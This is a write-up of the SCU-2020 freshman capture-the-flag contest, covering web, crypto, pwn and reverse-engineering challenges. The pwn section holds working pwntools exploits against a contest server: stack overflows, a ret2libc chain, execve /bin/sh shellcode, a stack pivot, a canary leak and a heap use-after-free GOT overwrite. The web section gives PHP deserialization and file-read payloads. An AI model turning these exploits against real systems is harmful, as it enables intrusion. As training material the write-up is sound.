SCU-2020-新生赛

没啥好说的

web

真的是签到题

截图即可

情感日记

两个部分 就在日记里

easyhtml

源代码注释

我爬我爬

robots.txt 得到ffflllaaaggg.html 访问得到base64编码 解码得到flag

看我后面

index.php.bak得到源码,弱比较,传入5201314得到flag

normalPHP

base64被过滤 用base32

?file=php://filter/read=convert.base32-encode/resource=flag.php

easyheehee

查看响应头 lookme 两次base64解码得到ffflllaaaggg.php 访问得到flag

easy_web

X-Forwarded-For: 127.0.0.1
Referer: http://scuctf.com
User-Agent: 0x401Browser
via: hgg.com

scuctf{i_am_a_powerful_hacker}

渣男记录

www.zip得到源码,select做参数 反序列化

wakeup修改了username 当序列化字符串中声明的属性个数大于实际属性个数时可以绕过wakeup(只对存在该缺陷的旧版PHP有效;根本的修复是不要对用户可控的数据做反序列化)

select=O:4:"Love":3:{s:8:"username";s:5:"admin";s:8:"password";i:520;}

scuctf{sadsa541-azhanana-2xzsdz}

打比赛不如看剧

binwalk 得到图片 dd提取

找到一模一样的题目

<?php
// Enumerates every 3-character string over [a-zA-Z0-9] and prints those whose
// MD5 hex digest satisfies the two digit relations tested below.
// NOTE(review): the arithmetic test feeds raw hex digits (possibly 'a'-'f' or
// '0') into + and /; with error_reporting(0) older PHP stays silent about
// that, while PHP 8 may raise an error instead -- confirm the PHP version
// this is run on.
error_reporting(0);
$string = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
echo strlen($string) . "\n";

for ($first = 0; $first < 62; $first++) {
    for ($second = 0; $second < 62; $second++) {
        for ($third = 0; $third < 62; $third++) {
            $flag = $string[$first] . $string[$second] . $string[$third];
            $token = md5($flag);

            // The digest is always 32 hex characters, so direct indexing
            // reads the same single characters as substr($token, k, 1).
            $d1 = $token[1];
            $d14 = $token[14];
            $d17 = $token[17];

            // Digest positions 7/9 and 14/17 must hold equal characters.
            if ($token[7] !== $token[9] || $d14 !== $d17) {
                continue;
            }

            // === also compares types: only an exact integer quotient can
            // equal intval() of the last digest character.
            if ((intval($d1) + intval($d14) + $d17) / $d1 === intval($token[31])) {
                echo $flag . "\n";
            }
        }
    }
}

scuctf{k0ngfu_ma_make_me_happ1}

有手就行

hgg博客

Crypto

classic_1

凯撒加密,偏移13

classic_2

十六进制解密,base64解密,摩斯电码,加上{}

SCUCTF{041918FC1EF6348768578F505F69D197}

RSA_1

e=3 爆破k攻击 c+k*n可以开三次方即得到m(明文没有填充,m^3只比n大有限倍,所以k可以枚举;使用OAEP之类的随机填充可以避免这种攻击)

import gmpy2


# Ciphertext from the challenge; the search functions below treat it as
# m**3 mod n and look for a k that makes cipher + k*n a perfect cube.
cipher = 892408374578063131162925795619920779766603018609992406621503024400320421262482556891045333045408815199768659578199823419716777827460090306221618906101139272423449131313434967763664295600593363990276765767066758967765012850672428517786210813209127040442832574380675662826137452780727264357
# RSA modulus.
n = 17076697689025821279984148703479525857912324396375097877800474725170566885465833732966897433803722770843910606215420934526050277173030062927090405120718833473629930226217051580832179577629652910778242159108718885516149768995851175071714817922775555170553827627677999093195969471873530031984433631909841287167351534954860426002075822101506835880510505034002629168205724869128357383388034971402180363910826536064357845040799329301895842061729319929568340334416516796267886218679042058969927331452548377324349084816441144473807565907927986545026739667157223640848553663532280797054758912745891410981282851031085852562257
# Public exponent. The functions below call iroot(..., 3) directly, so the
# value 3 is effectively hard-coded there and this name is not read.
e = 3


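# Recover the plaintext from the ciphertext
def get_flag():
    """Search k = 0, 1, 2, ... until ``cipher + k*n`` is a perfect cube.

    With e = 3 and no padding, the ciphertext equals ``m**3 - k*n`` for a
    small k, so the integer cube root of ``cipher + k*n`` is the message.
    The loop has no upper bound; it only ends when a perfect cube is found.

    Fixes over the original: the hit was recomputed with an undefined
    name ``x`` (NameError on the first match), and the decoding relied on
    Python 2's trailing ``L`` in ``hex()`` plus ``str.decode("hex")``.
    """
    import binascii  # function-scope: the module header only imports gmpy2

    k = 0
    while True:
        root, is_exact = gmpy2.iroot(cipher + k * n, 3)
        if is_exact:
            # "%x" never emits the Python 2 "L" suffix; unhexlify needs an
            # even number of digits, so pad a leading zero when required.
            hex_digits = "%x" % int(root)
            if len(hex_digits) % 2:
                hex_digits = "0" + hex_digits
            flag = binascii.unhexlify(hex_digits)
            # Python 2 prints the raw string, Python 3 prints a bytes repr.
            print(flag)
            break
        k += 1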


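def get_flag_for():
    """Bounded version of the cube-root search: try k in [0, 118720000).

    For each k, test whether ``cipher + k*n`` is a perfect cube; on the
    first hit print the integer root and its byte decoding, then stop.
    Nothing is printed when no k in the range matches.

    Fixes over the original: the cube root is computed once per k instead
    of twice, and the decoding no longer depends on Python 2's trailing
    ``L`` in ``hex()`` or on ``str.decode("hex")``.
    """
    import binascii  # function-scope: the module header only imports gmpy2

    for k in range(0, 118720000):
        root, is_exact = gmpy2.iroot(cipher + k * n, 3)
        if not is_exact:
            continue
        flag_bin = int(root)
        print(flag_bin)
        # unhexlify needs an even number of hex digits.
        hex_digits = "%x" % flag_bin
        if len(hex_digits) % 2:
            hex_digits = "0" + hex_digits
        flag = binascii.unhexlify(hex_digits)
        # Python 2 prints the raw string, Python 3 prints a bytes repr.
        print(flag)
        break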


if __name__ == "__main__":
    # Run the bounded search; the call to the unbounded variant is left
    # commented out.
    get_flag_for()
    # get_flag()

这里python3的decode出了点问题(python3的str没有decode('hex')这种用法) 用python2去decode

scuctf{8ef98504b1acb7c8c8976e60f53d9325}

math_1

EXCRT 抄一份代码 EXP

scuctf{234970795255267031279059393553}

RSA_2

分解n得到三个质数,但是不影响欧拉函数,python3还是没法decode

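# Reference derivation, kept disabled inside a string exactly as in the
# write-up: n is the product of three primes, phi is the product of
# (p - 1) over those primes, d = e^-1 mod phi and m = c^d mod n.
# It needs gmpy2; its result was pasted into `m` below.
'''
import gmpy2

a1 = gmpy2.mpz(199045230832669039221046041578658179479)
a2 = gmpy2.mpz(319438022064098846441615805897528174851)
a3 = gmpy2.mpz(334688613728124045578795340681788885633)
e = gmpy2.mpz(0x10001)
c = gmpy2.mpz(
7162732898109470668490761172640544970587920562229245172318483665877098759808623298921271357899945260719802967519239)
phi = (a1-1)*(a2-1)*(a3-1)
d = gmpy2.invert(e, phi)
print(d)
m = pow(c, d, a1*a2*a3)
print(m)
print(hex(m)[2:].decode('hex'))
'''
import binascii

# Decrypted message as an integer (output of the disabled derivation above).
m = 962767036565814783947965746329011592709220079643113763709122300620030874381407453748116812542077

# The original used the Python 2 only `print hex(m)[2:-1].decode('hex')`,
# which depends on the trailing "L" of a long's hex() and on the str "hex"
# codec. "%x" plus unhexlify gives the same bytes on Python 2 and 3.
hex_digits = "%x" % m
if len(hex_digits) % 2:
    hex_digits = "0" + hex_digits  # unhexlify needs an even digit count
flag_bytes = binascii.unhexlify(hex_digits)
print(flag_bytes)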

scuctf{e063d03aff353073c24617bd4b483f90}

math_2

直接网站在线解决,有两个j满足,选小的那一个

跳转

RSA_3

short_pad_attack 找博客 找代码

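def short_pad_attack(c1, c2, e, n):
    """Return the difference between two plaintexts encrypted under (e, n).

    Builds g1 = x^e - c1 and g2 = (x + y)^e - c2 over Zmod(n), eliminates x
    with a resultant, and asks small_roots() for a small root of the
    remaining univariate polynomial; that root is the difference y.

    Raises IndexError when small_roots() returns no root.

    The unused local `kbits` of the original was dropped; the root bound
    actually passed to small_roots() is the fixed constant below.
    Defensive takeaway: this only applies to RSA with a small exponent and
    short padding -- randomized full-width padding such as OAEP removes the
    small-difference structure the method depends on.
    """
    PRxy.<x, y> = PolynomialRing(Zmod(n))
    PRx.<xn> = PolynomialRing(Zmod(n))
    PRZZ.<xz, yz> = PolynomialRing(Zmod(n))

    g1 = x ^ e - c1
    g2 = (x + y) ^ e - c2

    q1 = g1.change_ring(PRZZ)
    q2 = g2.change_ring(PRZZ)

    # Resultant with respect to x leaves a polynomial in y only; it is then
    # moved into the univariate ring and made monic for small_roots().
    h = q2.resultant(q1)
    h = h.univariate_polynomial()
    h = h.change_ring(PRx).subs(y=xn)
    h = h.monic()

    # X is a hard-coded upper bound on the root for this challenge; beta=0.4
    # asks for a root modulo a factor of size >= n^0.4.
    roots = h.small_roots(X=114514191981019260817, beta=0.4)
    diff = roots[0]

    return diff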


def related_message_attack(c1, c2, diff, e, n):
    """Return the first plaintext given the known difference `diff`.

    Both x^e - c1 and (x + diff)^e - c2 vanish at the first plaintext, so
    their monic gcd over Zmod(n) is expected to be linear; the negated
    constant term of that gcd is returned.
    """
    R.<x> = PolynomialRing(Zmod(n))
    first = x ^ e - c1
    second = (x + diff) ^ e - c2

    # Euclid's algorithm on the two polynomials.
    a, b = first, second
    while b:
        a, b = b, a % b
    common = a.monic()

    return -common[0]


if __name__ == '__main__':
    # Challenge parameters: modulus, the two ciphertexts and the exponent.
    n = 91271647735744709097708757371810693819959773890255602892321052899291140524662404139036987856738557165460502348870154514187118388083897953512262523467951513248663220055679646915049292032986252072883347567763269025940548912246834125522235064649335386094011441612211361270863086815851273615300955370973053395447
    c1 = 8473924177689385097361186953656797062650227841190040965380473377780644233766714939608585534305414668494659709275756172697799483669925043356688884324887478394528746881611781366747757023562008158800275672858865552852268001893
    c2 = 8473924177689385097361186953656797062650227841190040969573197360345161215089076875501807117350711332682919389146002627145413765770680053006201105979670824332086933186715988612908312603963949643839015421185340358831260317777
    e = 3

    # Step 1: recover the difference between the two plaintexts.
    diff = short_pad_attack(c1, c2, e, n)
    print("difference of two messages is %d" % diff)

    # Step 2: use that difference to recover the first plaintext.
    m1 = related_message_attack(c1, c2, diff, e, n)
    print("m1:", m1)

在线运行Sage

scuctf{RSA_with_simple_padding}

baby_pad

最后pad_length是5 所以flag为 32-5 = 27位

classic_3[未提交]

词频分析

from itertools import *
from string import printable
# Every possible byte value; IndCo() counts occurrences of each of these.
alphabet = list(range(256))
# Per-character weights summed by score(): the space character plus the 26
# lowercase letters. Presumably English-text letter frequencies -- the
# source of the numbers is not shown here.
LETTER_FREQUENCY = {
' ': 0.25000,
'e': 0.12702,
't': 0.09056,
'a': 0.08167,
'o': 0.07507,
'i': 0.06966,
'n': 0.06749,
's': 0.06327,
'h': 0.06094,
'r': 0.05987,
'd': 0.04253,
'l': 0.04025,
'c': 0.02782,
'u': 0.02758,
'm': 0.02406,
'w': 0.02360,
'f': 0.02228,
'g': 0.02015,
'y': 0.01974,
'p': 0.01929,
'b': 0.01492,
'v': 0.00978,
'k': 0.00772,
'j': 0.00153,
'x': 0.00150,
'q': 0.00095,
'z': 0.00074
}
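def IndCo(s):
    """Return the index of coincidence of the byte sequence *s*.

    Computed as ``sum(f * (f - 1)) / (N * (N - 1))`` over the occurrence
    count ``f`` of every distinct value, with ``N = len(s)``.

    Sequences shorter than two items return 0.0; the original divided by
    zero there. Counting is a single pass instead of 256 ``count()`` scans;
    for bytes input the result is the same as before.
    """
    from collections import Counter  # function-scope: not imported by the file

    N = len(s)
    if N < 2:
        return 0.0
    frequency = Counter(s).values()
    return sum(f * f - f for f in frequency) / (N * N - N)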
def CalKeyLength(s):
    """Return candidate key lengths in [2, 37] for the ciphertext *s*.

    For each length the ciphertext is split into that many interleaved
    columns; the length is kept when the mean index of coincidence of the
    columns exceeds 0.06 and it is not a multiple of a length already kept.
    """
    candidates = []
    for length in range(2, 38):
        columns = [s[start::length] for start in range(length)]
        mean_ic = sum(IndCo(column) for column in columns) / length
        if not mean_ic > 0.06:
            continue
        # A zero remainder means `length` is a multiple of an earlier hit.
        if all(length % known for known in candidates):
            candidates.append(length)
    return candidates
def score(s):
    """Return the sum of LETTER_FREQUENCY weights over the characters of *s*.

    The text is lower-cased first; characters without an entry in the table
    add nothing.
    """
    return sum(
        LETTER_FREQUENCY[ch] for ch in s.lower() if ch in LETTER_FREQUENCY
    )
def RecoverKey(ct, kl):
    """Recover a *kl*-byte XOR key for the ciphertext *ct*.

    Each of the kl interleaved columns is tried against all 256 single-byte
    keys; candidates whose output is not entirely in ``string.printable``
    are discarded and the highest-scoring survivor becomes that key byte.
    ``max()`` raises ValueError when a column has no printable candidate.
    """
    recovered = bytearray()
    for column in [ct[offset::kl] for offset in range(kl)]:
        candidates = []
        for guess in range(256):
            plain = ''.join([chr(byte ^ guess) for byte in column])
            if all(ch in printable for ch in plain):
                candidates.append((guess, score(plain)))
        # Ties go to the lowest key byte because max() keeps the first maximum.
        best_guess, _ = max(candidates, key=lambda pair: pair[1])
        recovered.append(best_guess)
    return bytes(recovered)
def Vigenere_dec(cipher, key):
    """XOR every byte of *cipher* with the repeating *key*; return a str.

    Despite the name, the combining operation is XOR, not modular addition.
    """
    key_stream = cycle(key)
    # A list comprehension (not a generator) so that an exhausted key stream
    # surfaces exactly as it would in an explicit loop.
    return ''.join([chr(byte ^ next(key_stream)) for byte in cipher])
def main():
    """Decode the challenge ciphertext and print one decryption per key length."""
    # Hex-encoded challenge ciphertext.
    cipher = bytes.fromhex('1f124d150f1f460159124952072041541d584438011e0e175f780d1944190d1755451d0e141504470108120d264a05020918254a4d0b1c4e131644551d5c074d561517120d264a0802171739094144071a4604520849480c0a15131555442d1017080b1f3f17050e0b1f1759111e1d14150e4854085a07640d0108071b780b0b440e090a1e561345140b19150513434438021649010339070544010c461e5f181b57081a591b0849506401054913142546190c0b4e17125208085e440453544059052c1e5d490d0778130e11501a0e1211080e5311045b541d5844080903040c1825174144071a4604520849480c0a150104440b2e0f51080453400b1d07444e0d0111040a4144195d1754470b2e1e161b461e324609071d1e051e43594945074d5d13181207360d0312121b3f0c0c440e09041c431249471141150517120c230e51070b07400d03055010011360070e1417201954055544350d030e46143c0a4d0501050c141111024207104154085f440c0d121f011d7c461c07501b010756550a60104d541d1b6005640e1a1b01122446190c0b4e0b0159121b14150e4e5f5f590e641b190818077c46190c0b4e1612431e0858441c560154430d6e4a170a18533c0d0807501a0e1211051b57110a5b085442073201200d4a53240e0e18501f0b1a565508564406410154600d2b1b1a0e170778051a180803181e451e0e4144065b011b4318270e51080c533f1220440e090d1b58551b57010a5e061756506410201b4616390b094401204613600749571606596054590e641e190e460223160a12040d121e47124958070c471717120d264a14080903371806110104461c5f19121e')
    # Every byte is decremented by one before analysis; a zero byte in the
    # input would make bytes([-1]) raise ValueError.
    cipher = b''.join(bytes([c - 1]) for c in cipher)
    kls = CalKeyLength(cipher)
    print(f"All probable key length: {kls}")
    # Try each candidate length: recover a key, then print the decryption.
    for kl in kls:
        key = RecoverKey(cipher, kl)
        print(f"Key: {key}")
        print(Vigenere_dec(cipher, key))
# Run the analysis only when executed as a script.
if __name__ == '__main__':
    main()

scuctf{Welcomet0th3cl4ss1cCipher}

Pwn

nc

连上就是shell cat flag

ret2text

from pwn import *

# Local-process target, left disabled; the script talks to the CTF service.
##io = process('./ret2text')
io = remote('121.196.34.30', 10007)

# 0x18 filler bytes followed by one packed 64-bit value.
# Presumably 0x18 is the distance from the input buffer to the saved return
# address and 0x4007A5 is a code address inside the challenge binary --
# TODO confirm against the binary.
# NOTE(review): a fixed code address presumably only works because the binary
# has neither PIE nor a stack protector; either one would stop this kind of
# overwrite.
# NOTE: concatenating a str with p64(...) relies on Python 2 string semantics.
payload = 'a' * 0x18 + p64(0x4007A5)

io.sendline(payload)

# Hand the connection over to the terminal.
io.interactive()

flag{69c751a9-fec9-440f-bbd8-f4983a7f6859}

ret2libc

LibcSearcher找不到,泄漏了一下puts发现和自己的ubuntu16一样,直接拿自己libc打

from pwn import *
from LibcSearcher import *


# Local-process target, left disabled; the script talks to the CTF service.
#io = process('./ret2libc')
io = remote('121.196.34.30', 10005)

elf = ELF('./ret2libc')
# Fixed addresses inside the binary. Presumably `edi` is a gadget that loads
# the first-argument register and `start` is the program entry point --
# TODO confirm against the binary.
edi = 0x4009f3
start = 0x400790

# Stage 1: 0x78 filler bytes, then four packed values: the gadget, the GOT
# slot of puts, the PLT stub of puts, and `start`. The intent appears to be
# printing the runtime address of puts and then restarting the program.
payload = 'a' * 0x78
payload += p64(edi) + p64(elf.got['puts'])
payload += p64(elf.plt['puts']) + p64(start)
io.sendlineafter('ret2libc!\n', payload)

# Six bytes are read back and zero-padded to eight to form the leaked address.
puts = u64(io.recv(6).ljust(8, '\x00'))
success('puts : '+hex(puts))
# A local copy of libc is used to turn the leak into a load offset; the
# write-up states it matched the remote library.
libc = ELF('./libc-2.23.so')
offset = puts - libc.sym['puts']
success('offset : '+hex(offset))
system = offset + libc.sym['system']
# .next() on the search iterator is Python 2 syntax.
binsh = offset + libc.search('/bin/sh').next()

# Stage 2: same filler, then gadget, string address, system and `start`.
# NOTE(review): both stages depend on overwriting a saved return address;
# a stack protector would presumably stop them before any leak happens.
payload = 'a' * 0x78
payload += p64(edi) + p64(binsh)
payload += p64(system) + p64(start)
io.sendlineafter('ret2libc!\n', payload)

io.interactive()

flag{a84ce74a-1810-4ab9-b0db-210d48b7a3ac}

ret2shellcode

最后main函数返回的反汇编有点不太平常

.text:08048980                 mov     ecx, [ebp+var_4]
.text:08048983 leave
.text:08048984 lea esp, [ecx-4]
.text:08048987 retn

esp由ebp-4位置的值控制 注意一下就可以了

from pwn import *
from LibcSearcher import *


# Local-process target, left disabled; the script talks to the CTF service.
#io = process('./ret2shellcode')
io = remote('121.196.34.30', 10006)
# Disabled debugger attach with a breakpoint inside the binary.
#gdb.attach(io, 'b* 0x0804894A')
sleep(0.5)
# Layout: one packed 32-bit value, then a 25-byte i386 code stub ending in
# `int 0x80` with al = 0x0b; its pushed constants spell "//bin/sh".
# Presumably the input is stored at 0x080F0A00, so the leading word points
# just past itself at the stub -- TODO confirm against the binary.
payload = p32(0x080F0A04) + \
'\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80'
# Pad with NUL bytes up to 0x64 bytes in total.
payload += '\x00'*(0x64-len(payload))
# Trailing words. The write-up notes that the epilogue reloads esp from the
# value stored at [ebp-4]; presumably one of these words lands in that slot.
# NOTE(review): running bytes from a data buffer requires that memory to be
# executable; a non-executable data mapping (NX) would block this.
payload += p32(0x080F0A04)+p32(0x080F0A04)
payload += 'AAAA' + p32(0x080F0A00)

io.send(payload)

io.interactive()

flag{3ef12c4b-79f0-44f5-b119-e7b6f48c9aaa}

stack_migration

栈迁移 刚好够的那种

from pwn import *
from LibcSearcher import *


# Local-process target, left disabled; the script talks to the CTF service.
#io = process('./stack_migration')
io = remote('121.196.34.30', 10008)
elf = ELF('./stack_migration')
# Disabled debugger attach.
#gdb.attach(io, 'b* 0x4008C0')
# Fixed addresses inside the binary; `ret` is never used below. Presumably
# `edi` loads the first-argument register and `leave` is a `leave; ret`
# sequence -- TODO confirm against the binary.
ret = 0x400659
edi = 0x400993
leave = 0x4008cb

# The service prints a hexadecimal address after "addr:"; parse it.
io.recvuntil('addr:')
stack = int(io.recvline()[:-1], 16)

# Three packed 8-byte values followed by the string "/bin/sh": the string
# therefore sits 0x18 bytes into the payload, which is what stack+0x18 refers
# to if `stack` is the address where the payload is stored (presumably).
payload = p64(edi) + p64(stack+0x18) + p64(elf.plt['system']) + '/bin/sh\x00'

# Final two values: stack-8 and the `leave` address. Per the write-up this
# pivots the stack onto the payload itself.
# NOTE(review): the pivot depends on the service disclosing a stack address
# and on fixed code addresses; PIE and a stack protector would presumably
# break it.
payload += p64(stack-8) + p64(leave)

io.sendafter('SCUCTF:\n', payload)

io.interactive()

flag{9afea5c3-a5ff-4204-a9ba-82eb1c128f8f}

canary

覆盖掉’\x00’可以puts泄漏canary

from pwn import *
from LibcSearcher import *


# Local-process target, left disabled; the script talks to the CTF service.
#io = process('./canary')
io = remote('121.196.34.30', 10000)


# Fixed address inside the binary, used twice after the canary below.
# NOTE(review): despite the name it is placed where code addresses go, so it
# is presumably a code address rather than a string -- TODO confirm.
binsh = 0x400885
io.sendlineafter('length?\n', '32')
# 0x18 filler bytes plus one marker byte. Per the write-up the marker
# overwrites the canary's leading NUL byte so the echo runs on into it.
payload = 'A'*0x18+'#'
io.sendafter('what?\n', payload)
io.recvuntil('#')
# Rebuild the 8-byte canary: the overwritten NUL plus the 7 bytes echoed back.
canary = '\x00'+io.recv(7)
success('canary : '+hex(u64(canary))[2:])

# Second write: filler, the recovered canary, then the address twice.
# NOTE(review): the leak exists because the input is echoed without being
# NUL-terminated; terminating the buffer (or bounding the echo) closes it.
payload = 'A'*0x18+canary+p64(binsh)*2
io.sendafter('OK!\n', payload)

io.interactive()

flag{a482f708-a883-40b9-81f5-1f205eb565f3}

easy_uaf

unsorted bin泄露libc fastbin改fd

把堆分配到bss上存堆指针的地方 把堆的指针改成freegot

edit覆盖成sysplt 然后free就变成了sys

让某个堆里写个sh free

from pwn import *
from LibcSearcher import LibcSearcher
def add(size, content):
    """Pick menu entry 1, then answer the size and buffer prompts."""
    menu_choice = '1'
    io.sendlineafter('>> ', menu_choice)
    size_text = str(size)
    io.sendlineafter('size: ', size_text)
    # The buffer is sent without a trailing newline.
    io.sendafter('buf: ', content)

def edit(id, content):
    """Pick menu entry 2, then answer the index and buffer prompts."""
    menu_choice = '2'
    io.sendlineafter('>> ', menu_choice)
    index_text = str(id)
    io.sendlineafter('idx: ', index_text)
    # The buffer is sent without a trailing newline.
    io.sendafter('buf: ', content)

def show(id):
    """Pick menu entry 3 and answer the index prompt; output is not read here."""
    menu_choice = '3'
    io.sendlineafter('>> ', menu_choice)
    index_text = str(id)
    io.sendlineafter('idx: ', index_text)

def free(id):
    """Pick menu entry 4 and answer the index prompt."""
    menu_choice = '4'
    io.sendlineafter('>> ', menu_choice)
    index_text = str(id)
    io.sendlineafter('idx: ', index_text)

# Local-process target, left disabled; the script talks to the CTF service.
#io = process('./easy_uaf')
io = remote('121.196.34.30', 10001)
elf = ELF('./easy_uaf')
# context.log_level='debug'

# The trailing "# N" markers are the author's running chunk indices.
add(0x100, 'b') # 0
add(0x60, 'a') # 1
free(0)
add(0x60, 'a') # 2
# Per the write-up, the re-allocated chunk still holds an unsorted-bin
# pointer into libc, which show() prints back.
show(2)
# Six bytes are read and zero-padded; 0x151 is a fixed adjustment from the
# leaked value to __malloc_hook (presumably specific to this libc build).
malloc_hook = u64(io.recv(6)+'\x00\x00')-0x151
success(hex(malloc_hook))

# libc = LibcSearcher('__malloc_hook', malloc_hook)
# A local copy of libc turns the leak into a base address.
libc = ELF('./libc-2.23.so')
libcbase = malloc_hook-libc.sym['__malloc_hook']
success(hex(libcbase))
sys_addr = libc.sym['system']+libcbase
success(hex(sys_addr))

# Fixed address in the binary; per the write-up it lies in .bss next to the
# table of heap pointers.
fake_chunk = 0x60209d
free_got = elf.got['free']

# The frees and edits below act on chunks that were already released; the
# program evidently keeps its pointers usable after free().
free(2)
add(0x60, p64(fake_chunk)) # 3
free(1)
free(2)
edit(3, p64(fake_chunk))

add(0x60, '/bin/sh\x00') # 4
# gdb.attach(p)
# Per the write-up this allocation lands on the pointer table and replaces
# a stored pointer with the GOT slot of free, followed by the value 8.
add(0x60, 'a'*(0x13)+p64(free_got)+p64(8))
# Writes the computed system address through entry 0.
# NOTE(review): this presupposes a writable GOT (no full RELRO); clearing
# pointers on free and enabling full RELRO would both presumably stop it --
# TODO confirm the binary's build flags.
edit(0, p64(sys_addr))
free(3)

io.interactive()

flag{be6f3d34-5cc0-4023-8f94-7238e8e4e35c}

RE

easyF5

F5

pytrade

在线pyc反编译得到base64加密串,解密得到flag

easypack

UPX解压缩,每个字符异或0x12得到flag

maze

替换一下空格

.*...*****
...*.*****
****..****
*****....*
********..

scuctf{DRRURRDDRDRRRDR}

crackme

IDA在输入前下断,单步到判断,修改zf,continue得到flag

scuctf{e2b2fffd4ef9306d02beafbcd668aabb}

decryptme

dump函数,爆破

#include <stdio.h>
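/*
 * Recover the 32-character input of the "decryptme" check.
 *
 * For every position i, try each candidate byte c in [0x2f, 0x7f) and keep
 * the first one whose transformed value equals goal[i]. The do/while loop is
 * a carry-propagating adder written with AND/XOR/shift, so the transformed
 * value is i + c. Positions with no matching candidate print nothing.
 *
 * The unused locals of the original (v2, v3, v5, v8 and their dead stores)
 * were removed; the output is unchanged.
 */
int main(int argc, char *argv[])
{
    /* Expected transformed bytes, one per input position. */
    char goal[] = "34e8h9?<<mkCD>F@DEDCzHxxKRQRNSRS";

    (void)argc;
    (void)argv;

    for (int i = 0; i < 32; i++) {
        for (int c = 0x2f; c < 0x7f; c++) {
            int sum = c;      /* running XOR sum, ends as i + c */
            int addend = i;   /* remaining carry to fold in */
            int carry;

            do {
                carry = 2 * (addend & sum);
                sum ^= addend;
                addend = carry;
            } while (carry);

            if (sum == goal[i]) {
                printf("%c", c);
                break;
            }
        }
    }
    printf("\n");

    return 0;
}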

scuctf{33c5d4954da881814420f3ba39772644}

helptingting

处理太麻烦

EXP

scuctf{b5ee21708409a1a05f5401199997bd65}

pytrade-plus

用网址内工具反编译,挨着挨着看pyc 找到controller.pyc为主要函数,一个方程z3解

scuctf{39333031323433373134303932333037}

虚假的比较函数

存在TLS

发现奇怪的运算函数sub_140015D70

hook之后发现第一个参数是输入,第二个参数是scuctf{fakeflag}

复杂计算之后与input异或,但是没有把数据dump出来

复制代码,添加IDA宏定义自己跑

异或得到flag

代码

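# XOR the 44 constant bytes in `b` with bytes read from so.in and print the
# resulting text.
# Changes from the original: the file is closed via `with`, the string is
# built with join, and print() is written so it runs on Python 2 and 3.
b = [0xeb, 0x72, 0xd4, 0x76, 0x6f, 0x9c, 0xe2, 0x99, 0x99, 0x89, 0x1, 0xfe, 0x81, 0xfb, 0x62, 0x31, 0x6b, 0xb0, 0xf7, 0xec, 0xe9, 0x9e,
     0x36, 0xc6, 0x2e, 0x9f, 0x7, 0xa0, 0x20, 0xe9, 0xcc, 0x32, 0x7c, 0x5e, 0x22, 0x5f, 0xb7, 0xa9, 0x61, 0xa5, 0xa8, 0x1c, 0x70, 0x37]

# so.in is read as three lines of sixteen two-digit hex values, each value
# occupying three columns (two digits plus one separator).
a = []
with open('so.in') as f:
    for _ in range(3):
        s = f.readline()
        for j in range(16):
            a.append(int(s[j*3:j*3+2], 16))

# Only the first 44 of the 48 values read are used.
text = ''.join(chr(a[i] ^ b[i]) for i in range(44))
print(text)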

easyapk

直接看so文件,tea加密

#include <stdint.h>
#include <stdio.h>
#include <string.h>

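/*
 * Decrypt one 64-bit TEA block in place.
 *
 * v: the two 32-bit halves of the block; k: the four 32-bit key words.
 * `sum` starts at 0xC6EF3720, which is 32 * delta modulo 2^32, and is
 * stepped down by delta over 32 rounds.
 *
 * The original used `unsigned long`, which is 64 bits wide on LP64
 * platforms: the arithmetic was no longer modulo 2^32 and the casts in
 * main() read past the 16-byte key. Fixed-width uint32_t removes both
 * problems.
 */
void decrypt(uint32_t *v, const uint32_t *k)
{
    uint32_t y = v[0], z = v[1], sum = 0xC6EF3720, i; /* set up */
    uint32_t delta = 0x9e3779b9;                      /* key schedule constant */
    uint32_t a = k[0], b = k[1], c = k[2], d = k[3];  /* cache key */

    for (i = 0; i < 32; i++) {
        z -= ((y << 4) + c) ^ (y + sum) ^ ((y >> 5) + d);
        y -= ((z << 4) + a) ^ (z + sum) ^ ((z >> 5) + b);
        sum -= delta;
    }
    v[0] = y;
    v[1] = z;
}

/*
 * Decrypt the four 8-byte blocks of the embedded ciphertext with the
 * embedded key and print the 32 resulting bytes.
 *
 * Words are loaded with memcpy in host byte order, which matches what the
 * original pointer casts did on a little-endian machine with 32-bit long,
 * without the alignment and aliasing problems of casting char* to a wider
 * pointer type.
 * Defensive takeaway: a key stored as a constant in a shipped library can
 * be read straight out of it, as the write-up did here.
 */
int main()
{
    const unsigned char key_bytes[16] = {0xEF, 0xBE, 0xAD, 0xDE, 0x14, 0x45, 0x11, 0xAA, 0x61, 0x73, 0x75, 0x79, 0x73, 0x64, 0x79, 0x79};
    unsigned char flag[32] = {0xDB, 0x03, 0xF6, 0x88, 0x08, 0xCA, 0x55, 0x15, 0x74, 0x19, 0xDA, 0xB9, 0x37, 0x46, 0x12, 0xF8,
                              0x26, 0xCA, 0xF9, 0x86, 0x40, 0x29, 0x47, 0xB5, 0xA0, 0xD6, 0xAA, 0x19, 0x42, 0x3F, 0xF1, 0x46
                             };
    uint32_t key[4];

    memcpy(key, key_bytes, sizeof key);

    /* Each 8-byte block is decrypted independently with the same key. */
    for (size_t off = 0; off < sizeof flag; off += 8) {
        uint32_t block[2];

        memcpy(block, flag + off, sizeof block);
        decrypt(block, key);
        memcpy(flag + off, block, sizeof block);
    }

    for (int i = 0; i < 32; i++)
        printf("%c", flag[i]);
    printf("\n");
    return 0;
}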

junk

jmp selfaddr+1花指令

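# Decrypt 29 bytes read from so.in with a key-scheduled byte table; the
# two phases below match RC4's key scheduling and keystream generation.
# Changes from the original: the file is closed via `with`, swaps use tuple
# assignment, the key length is taken from the key instead of a literal 9,
# and print() is written so it runs on Python 2 and 3.

# so.in is read as two lines of sixteen two-digit hex values, each value
# occupying three columns (two digits plus one separator).
a = []
with open('so.in') as f:
    for _ in range(2):
        s = f.readline()
        for j in range(16):
            a.append(int(s[j*3:j*3+2], 16))
print(a)

key = 'h4mbur93r'
# table1 is the permutation state; table2 is the key repeated to 256 bytes.
table1 = list(range(256))
table2 = [ord(key[i % len(key)]) for i in range(256)]

# Key scheduling: shuffle table1 under control of the key bytes.
v9 = 0
for i in range(256):
    v9 = (table2[i] + v9 + table1[i]) % 256
    table1[v9], table1[i] = table1[i], table1[v9]

# Keystream generation: one keystream byte per ciphertext byte. Only the
# first 29 of the 32 values read are decrypted, so v6 never reaches 256.
v6 = 0
v10 = 0
chars = []
for i in range(29):
    v6 += 1
    v10 = (v10 + table1[v6]) % 256
    table1[v10], table1[v6] = table1[v6], table1[v10]
    chars.append(chr(a[i] ^ table1[(table1[v10] + table1[v6]) % 256]))
flag = ''.join(chars)
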